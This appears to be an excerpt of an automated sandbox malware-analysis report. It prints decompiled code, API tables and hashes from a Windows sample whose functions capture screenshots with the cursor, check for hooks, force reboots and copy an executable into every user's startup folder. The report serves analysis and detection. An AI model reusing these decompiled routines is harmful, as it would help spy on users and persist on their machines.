					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E00406E55(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E00406E85(_v40);
													if(_a12 == 0) {
														_t122 =  &_v32; // 0x41247c
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00406EC1( &_v148, 0x404724, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t142 =  &_v32; // 0x41247c
															_t223 = _v108(_v12,  *_t142,  &_v188,  &_v152);
															_t145 =  &_v32; // 0x41247c
															_t224 =  *_t145;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E00406EC1( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x00411fd2
0x00411fd5
0x00411fd8
0x00411fdb
0x00411fe2
0x00411fe5
0x00411fe8
0x00411feb
0x00411ff9
0x00412006
0x00412013
0x00412020
0x0041202d
0x0041203a
0x00412047
0x0041204a
0x0041204c
0x00412052
0x00412436
0x0041243f
0x00412444
0x00412444
0x00412449
0x0041244e
0x0041244e
0x00412453
0x00412458
0x00412458
0x0041245a
0x00412461
0x0041208d
0x00412092
0x0041209a
0x0041209d
0x0041209f
0x004120a4
0x00000000
0x00000000
0x004120af
0x004120b7
0x004120c4
0x004120d0
0x004120dd
0x004120ea
0x004120f7
0x00412104
0x00412111
0x00412114
0x00412116
0x0041211b
0x00000000
0x0041215f
0x0041215f
0x00412163
0x00412167
0x00412168
0x0041216f
0x00412172
0x00412175
0x0041217d
0x00000000
0x00000000
0x0041218d
0x0041218f
0x00412194
0x00412430
0x00412433
0x00000000
0x00412433
0x0041219b
0x0041219e
0x004121a3
0x0041242a
0x0041242d
0x00000000
0x0041242d
0x004121b8
0x004121be
0x004121c3
0x004121ed
0x004121ed
0x00000000
0x004121c5
0x004121d5
0x004121e5
0x004121e5
0x004121eb
0x004121f1
0x004121f4
0x004121f7
0x00412204
0x0041220c
0x00412211
0x004121f9
0x004121f9
0x004121fc
0x004121fc
0x0041221b
0x0041221e
0x00412223
0x00412424
0x00412427
0x00000000
0x00412229
0x0041222d
0x00412230
0x00412235
0x0041241e
0x00412421
0x00000000
0x00412421
0x0041223b
0x0041223d
0x00412242
0x0041224d
0x00412251
0x00412256
0x00412259
0x00412259
0x0041225c
0x0041225e
0x0041225e
0x00412261
0x00412261
0x00412264
0x00412266
0x00412266
0x00412264
0x00412269
0x0041226e
0x0041226f
0x00412270
0x00412273
0x00412276
0x00412277
0x00412278
0x00412279
0x00412281
0x00412415
0x0041241b
0x00000000
0x00412287
0x0041228a
0x0041229b
0x0041229e
0x004122a4
0x004122ac
0x004122ac
0x004122b5
0x004122b6
0x004122b7
0x004122ba
0x004122c2
0x00000000
0x004122d1
0x004122d4
0x004122d8
0x004122d9
0x004122dc
0x004122e4
0x0041240f
0x00412412
0x00000000
0x00412412
0x004122ea
0x004122ef
0x00000000
0x004122fe
0x00412303
0x00412305
0x0041230a
0x00000000
0x00000000
0x00412310
0x00412311
0x00412314
0x0041231c
0x0041235a
0x0041235d
0x00412365
0x0041236b
0x00412372
0x00412373
0x00412379
0x00412388
0x00412391
0x004123a1
0x004123af
0x004123c0
0x004123d0
0x004123d4
0x004123d4
0x004123e8
0x004123ee
0x004123f3
0x004123f3
0x004123f6
0x0041240c
0x004123f8
0x004123fb
0x004123fe
0x004123fe
0x004123f6
0x00412379
0x00000000
0x00412365
0x0041231e
0x00412323
0x00000000
0x00000000
0x00412325
0x00412328
0x00412337
0x00412338
0x0041233e
0x00000000
0x00000000
0x00000000
0x00412340
0x00412352
0x00412357
0x00000000
0x00412357
0x004122ef
0x004122c2
0x00412281
0x00412223
0x00000000
0x004121eb
0x004121c3
0x0041211b

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 00411FEB
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00411FFC
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00412009
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00412016
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00412023
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 00412030
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041203D
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041204A
LoadLibraryA.KERNEL32(ole32.dll), ref: 00412092
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041209D
LoadLibraryA.KERNEL32(gdi32.dll), ref: 004120AF
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 004120BA
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 004120C6
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 004120D3
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 004120E0
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 004120ED
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 004120FA
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00412107
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 00412114
LoadImageW.USER32 ref: 004121B8
GetIconInfo.USER32(00000000,?), ref: 004121CD
GetCursorPos.USER32(?), ref: 004121DB
DrawIcon.USER32 ref: 004122AC
lstrcmpiW.KERNEL32(?,-00000030), ref: 0041232D
FreeLibrary.KERNEL32(00000000), ref: 00412444
FreeLibrary.KERNEL32(?), ref: 0041244E
FreeLibrary.KERNEL32(00000000), ref: 00412458

Strings

CreateCompatibleDC, xrefs: 004120BC
DISPLAY, xrefs: 00412186
DeleteObject, xrefs: 004120FC
|$A, xrefs: 0041245A, 0041236B, 004123E8, 004123F3, 0041236E, 004123FA
CreateDCW, xrefs: 004120B1
GdipCreateBitmapFromHBITMAP, xrefs: 0041200B
SelectObject, xrefs: 004120E2
CreateStreamOnHGlobal, xrefs: 00412094
GdiplusShutdown, xrefs: 00411FFE
BitBlt, xrefs: 004120EF
ole32.dll, xrefs: 0041208D
GetDeviceCaps, xrefs: 004120D5
GdiplusStartup, xrefs: 00411FF3
gdiplus.dll, xrefs: 00411FCD
gdi32.dll, xrefs: 004120AA
GdipSaveImageToStream, xrefs: 0041203F
CreateCompatibleBitmap, xrefs: 004120C8
DeleteDC, xrefs: 00412109
GdipGetImageEncodersSize, xrefs: 00412025
GdipDisposeImage, xrefs: 00412018
GdipGetImageEncoders, xrefs: 00412032

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll$|$A
API String ID: 1554524784-1501024288
Opcode ID: 10986500c6c58dfeb3087a70b2c4d38db88f271f68b206abea9cf8ff957aed14
Instruction ID: aab3634f32b12c978e74aabec75a68518172e6021f42c4b1fa6dede705e7bf31
Opcode Fuzzy Hash: 10986500c6c58dfeb3087a70b2c4d38db88f271f68b206abea9cf8ff957aed14
Instruction Fuzzy Hash: CEE1B571D00269AFCF209FE5CE88AEEBBB9FB48301F14446AE615B2250D7785991CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004136AC, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004136AC(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
				char _v536;
				void* _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				char _v764;
				short _v772;
				int _v776;
				int _v780;
				void _v781;
				void* _v784;
				char _v785;
				void _v788;
				void _v789;
				void* _v792;
				char _v793;
				char _v797;
				void* _v800;
				void* _v804;
				void* _v808;
				char _v809;
				int _v813;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t73;
				int _t78;
				intOrPtr* _t79;
				int _t81;
				void* _t83;
				int _t87;
				void* _t91;
				int _t99;
				int _t107;
				void* _t112;
				int _t129;
				void* _t138;
				void* _t145;
				void* _t147;
				void* _t167;

				_t167 = __fp0;
				_t138 = __edx;
				_t135 = __ecx;
				_t149 =  &_v764;
				_v781 = 0;
				if(E0040C09A(0, __ecx,  &_v764,  *0x4239c4) != 0) {
					_v780 = _v760;
					_t129 = E00413336( &_v780, __ecx, _v764);
					_v776 = _t129;
					if(_t129 == 0) {
						_v780 = 0;
					}
					E0040C142( &_v764);
				}
				if(_v780 != 0x1e6) {
					__eflags = _v780 - 0xc;
					if(__eflags != 0) {
						L41:
						E00406E85(_v772);
						return _v785;
					}
					_t73 = E00412EC8(_t135, __eflags, 0x8889347b, 2);
					_v776 = _t73;
					__eflags = _t73;
					if(_t73 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E004088EA(0, _t149,  *0x4239c4);
						}
						goto L41;
					}
					E00412E8D(0x19367401,  &_v748, 1);
					_t78 = E0040A668( &_v760);
					_t149 = GetFileAttributesExW;
					__eflags = _t78;
					if(_t78 == 0) {
						L23:
						_t79 =  *0x42396c;
						__imp__IsWellKnownSid( *_t79, 0x16);
						__eflags = _t79 - 1;
						if(__eflags != 0) {
							_v789 = 0;
							_t81 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
							__eflags = _t81;
							if(_t81 == 0) {
								L29:
								_push( *_v780);
								_t83 = E0040D29A(_t135, L00415BC3,  *((intOrPtr*)(_v780 + 8)));
								_t149 = 0x4239c8;
								_v797 = L00415BC3(_t83, 0, 0x4239c8, L00415BC3);
								L30:
								__eflags = _v793 - 1;
								if(_v793 == 1) {
									_t87 = E0040874C( &_v536, 0, _t149, 0,  &_v776);
									__eflags = _t87;
									_v813 = _t87 != 0;
									__eflags = _v813;
									if(_v813 != 0) {
										E00412E8D(0x1a43533f,  &_v760, 1);
										_t91 = CreateEventW(0x4239a0, 1, 0,  &_v772);
										_t145 = _v788;
										_v804 = _t91;
										_v800 = _t145;
										_push(0xffffffff);
										__eflags = _t91;
										if(_t91 != 0) {
											WaitForMultipleObjects(2,  &_v792, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags = _v792;
										if(_v792 != 0) {
											CloseHandle(_v792);
										}
										CloseHandle(_v772);
										CloseHandle(_t145);
									}
								}
								L38:
								E0040A658(_v780);
								goto L39;
							}
							__eflags = _v789 - 0xe9;
							if(_v789 != 0xe9) {
								goto L29;
							}
							_t99 = GetFileAttributesExW(0x423dd6, 0x78f16360,  &_v788);
							__eflags = _t99 - 1;
							if(_t99 != 1) {
								goto L29;
							}
							_push( *_v784);
							E0040D29A(_t135, L00415F2F,  *((intOrPtr*)(_v784 + 4)));
							_push(_a4);
							_t149 = 0x4239c8;
							_push( &_v544);
							_v809 = L00415F2F( &_v544, _v800, L00415F2F, 0x4239c8, _t167);
							VirtualFree(_v808, 0, 0x8000);
							goto L30;
						}
						_v789 = E0041628F(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v781 = 0;
						_t107 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
						__eflags = _t107;
						if(_t107 == 0) {
							goto L22;
						}
						__eflags = _v781 - 0xe9;
						if(_v781 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E00415E78(_t135, _t138, _v772) != 0) {
					E00412E8D(0x32901130,  &_v748, 1);
					_t112 = CreateMutexW(0x4239a0, 1,  &_v760);
					_v792 = _t112;
					if(_t112 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle(_v780);
							_v780 = 0;
						}
						if(_v780 != 0) {
							E004124FF(_t135,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x423968 =  *0x423968 | 0x00000010;
							}
							E00405F8D();
							if(( *0x423968 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00412E8D(0x1a43533f,  &_v748, 1);
							_t147 = OpenEventW(2, 0,  &_v760);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E004133F3(1);
							_v785 = 1;
							CloseHandle(_v784);
						}
					}
				}
				goto L41;
			}

0x004136ac
0x004136ac
0x004136ac
0x004136c5
0x004136c9
0x004136d4
0x004136de
0x004136e6
0x004136eb
0x004136f1
0x004136f3
0x004136f3
0x004136fb
0x004136fb
0x00413708
0x004137f4
0x004137f9
0x004139dc
0x004139e0
0x004139ef
0x004139ef
0x00413806
0x0041380b
0x0041380f
0x00413811
0x004139cb
0x004139cb
0x004139cf
0x004139d7
0x004139d7
0x00000000
0x004139cf
0x00413823
0x0041382d
0x00413832
0x0041383e
0x00413840
0x0041386b
0x0041386b
0x00413874
0x0041387a
0x0041387d
0x00413898
0x0041389c
0x0041389e
0x004138a0
0x00413903
0x00413907
0x00413911
0x00413916
0x00413929
0x0041392d
0x0041392d
0x00413932
0x00413948
0x0041394d
0x0041394f
0x00413954
0x00413958
0x00413966
0x00413978
0x0041397e
0x00413982
0x00413986
0x0041398a
0x0041398c
0x0041398e
0x004139a1
0x00413990
0x00413991
0x00413991
0x004139a7
0x004139ad
0x004139b1
0x004139b7
0x004139b7
0x004139bd
0x004139c0
0x004139c0
0x00413958
0x004139c2
0x004139c6
0x00000000
0x004139c6
0x004138a2
0x004138a7
0x00000000
0x00000000
0x004138b8
0x004138ba
0x004138bd
0x00000000
0x00000000
0x004138c3
0x004138cd
0x004138d2
0x004138e0
0x004138e5
0x004138f7
0x004138fb
0x00000000
0x004138fb
0x00413884
0x00000000
0x00000000
0x00000000
0x00000000
0x00413842
0x00413842
0x0041384d
0x00413851
0x00413853
0x00413855
0x00000000
0x00000000
0x00413857
0x0041385c
0x00000000
0x00000000
0x0041385e
0x00413863
0x00413863
0x00413842
0x00413719
0x0041372b
0x0041373c
0x00413742
0x00413748
0x0041375f
0x00413765
0x00413767
0x00413767
0x0041376f
0x0041377d
0x0041378a
0x0041378c
0x0041378c
0x00413793
0x0041379f
0x004137a8
0x004137a8
0x004137ba
0x004137cd
0x004137d1
0x004137d4
0x004137db
0x004137db
0x004137df
0x004137e8
0x004137ed
0x004137ed
0x0041376f
0x00413748
0x00000000

APIs

Part of subcall function 0040C09A: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0BF
Part of subcall function 0040C09A: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0D2

CreateMutexW.KERNEL32(004239A0,00000001,?,32901130,?,00000001,?), ref: 0041373C
GetLastError.KERNEL32 ref: 0041374E
CloseHandle.KERNEL32(000001E6), ref: 00413765
ExitWindowsEx.USER32(00000014,80000000), ref: 004137A8
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 004137C7
SetEvent.KERNEL32(00000000), ref: 004137D4
CloseHandle.KERNEL32(00000000), ref: 004137DB
CloseHandle.KERNEL32(000001E6,00000001), ref: 004137ED
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00413851
Sleep.KERNEL32(000001F4), ref: 00413863
IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00413874
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0041389C
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004138FB
GetFileAttributesExW.KERNEL32(00423DD6,78F16360,0000000C), ref: 004138B8

Part of subcall function 0040D29A: VirtualProtect.KERNEL32(00415BC3,?,00000040,00000000,74B5F9B0,?,?,00413916,?,?), ref: 0040D2AF
Part of subcall function 0040D29A: VirtualProtect.KERNEL32(00415BC3,?,00000000,00000000,?,?,00413916,?,?), ref: 0040D2E2

CreateEventW.KERNEL32(004239A0,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,004239C8,00000000,?,?,?), ref: 00413978
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00413991
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004139A1
CloseHandle.KERNEL32(0000000C), ref: 004139B7
CloseHandle.KERNEL32(?), ref: 004139BD
CloseHandle.KERNEL32(?), ref: 004139C0

Strings

, xrefs: 00413782

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-3916222277
Opcode ID: 2bd3b561058b10fc4b8857bcecdd05660f448771b34e7fba02d0046019db571e
Instruction ID: 136c45267987fb44d3816318b198adc8bc9db3729ebf6d3fc3f2a44a0403b102
Opcode Fuzzy Hash: 2bd3b561058b10fc4b8857bcecdd05660f448771b34e7fba02d0046019db571e
Instruction Fuzzy Hash: 3791D5B1508345AFD711EF608D45EEF7BE8AF84315F40092FF594A21A1C7B8DA88CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041628F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041628F(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E00405B00(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E00405ACA(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E004079D4(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00407226(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E00413C42( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0040C70A( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0040C48C( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0040B335(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0041598E( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E00415ABB( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0040B335(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0041598E(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x0041629d
0x004162a5
0x004162a8
0x004162b6
0x004162ba
0x00416357
0x00000000
0x004162c0
0x004162c0
0x004162c8
0x004162d1
0x004162d9
0x004162de
0x004162df
0x004162e5
0x004162e6
0x004162f2
0x004162f4
0x00416302
0x0041630a
0x0041630c
0x00416312
0x00416318
0x0041632d
0x00416332
0x00416342
0x00416347
0x00416347
0x0041632d
0x0041630a
0x004162f2
0x0041634c
0x00416355
0x0041635e
0x00416361
0x00416364
0x00416369
0x0041637f
0x00416382
0x00416388
0x0041638b
0x0041638d
0x0041639a
0x0041639a
0x0041639d
0x00000000
0x00000000
0x004163a3
0x004163a5
0x004163a8
0x00416464
0x00416467
0x00000000
0x00000000
0x00000000
0x00000000
0x004163ae
0x004163ae
0x004163bb
0x004163c1
0x004163c3
0x004163c9
0x004163cc
0x004163ce
0x004163d4
0x004163de
0x004163e3
0x004163e5
0x004163f5
0x004163fa
0x004163fc
0x00416405
0x0041640a
0x0041640c
0x00416425
0x00416427
0x00416437
0x00416439
0x00416448
0x0041644c
0x0041644c
0x00416439
0x00416427
0x0041640c
0x004163fc
0x00416454
0x00416454
0x004163ce
0x0041645a
0x0041645b
0x0041645b
0x00000000
0x004163ae
0x0041638f
0x00416394
0x00000000
0x00000000
0x00000000
0x0041646d
0x0041646d
0x0041646d
0x0041647a
0x0041648b
0x00416491
0x00416493
0x004164ac
0x004164ae
0x004164b9
0x004164be
0x004164c0
0x004164c2
0x004164c2
0x004164c0
0x004164ae
0x00000000
0x004164c6
0x00000000
0x00416355

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004162B0
GetProcAddress.KERNEL32(00000000,?), ref: 004162D1
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00416302
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00416325
FreeLibrary.KERNEL32(00000000), ref: 0041634C
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 00416382
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004163BB
NetApiBufferFree.NETAPI32(?,?,?), ref: 00416454
NetApiBufferFree.NETAPI32(?), ref: 00416467
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041648B

Strings

.exe, xrefs: 00416364, 00416410, 00416497

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: 1077638c9c4b7a914ce724dc0d05ab6d9d310bd8fe16862d17a5de601a6ad1d5
Instruction ID: 55586cea70fabfa864413a87556aec7fb8c5558969b14330c9dfb4dea546f97f
Opcode Fuzzy Hash: 1077638c9c4b7a914ce724dc0d05ab6d9d310bd8fe16862d17a5de601a6ad1d5
Instruction Fuzzy Hash: CF6171B1900218AFDF10DB94CC84EEFB7BDAB44304F1045AAF915F3191D739DA898B58

Uniqueness

Uniqueness Score: -1.00%

Function 004087A7, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004087A7(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
